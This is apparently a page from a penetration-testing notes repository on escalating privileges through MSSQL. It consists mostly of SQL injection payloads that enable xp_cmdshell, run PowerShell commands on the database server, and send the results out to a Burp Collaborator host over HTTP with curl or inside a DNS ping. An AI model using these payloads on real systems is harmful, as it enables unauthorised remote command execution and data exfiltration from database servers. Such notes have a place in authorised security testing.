Skip to content

Latest commit

 

History

History
 
 

Privilege Escalation - MSSQL

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

MSSQL Privilege Escalation

Blind RCE

First we have to enable xp_cmdshell:

; EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE; EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;--

Now we execute command and getting the output on our Burp Collaborator:

;EXEC xp_cmdshell ‘powershell -c “$x = whoami; curl http://my-burp-link.burpcollaborator.net/get?output=$x"';--

The harder approach

The following command enabled xp_cmdshell, and executes a simple powershell command and get the executed command response in DNS request.

random';EXEC sp_configure 'show advanced options', 1; EXEC sp_configure 'xp_cmdshell', 1; reconfigure with override; exec master..xp_cmdshell 'powershell $cmd=whoami;  $enc=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmd)).trim(''=''); ping -n 1 $enc''.mysubdomainhere.burpcollaborator.net'' '-- -

If successfully, on Collaborator you will see:

burp_collaborator

Reference

https://github.com/man1pulator/pentest_diary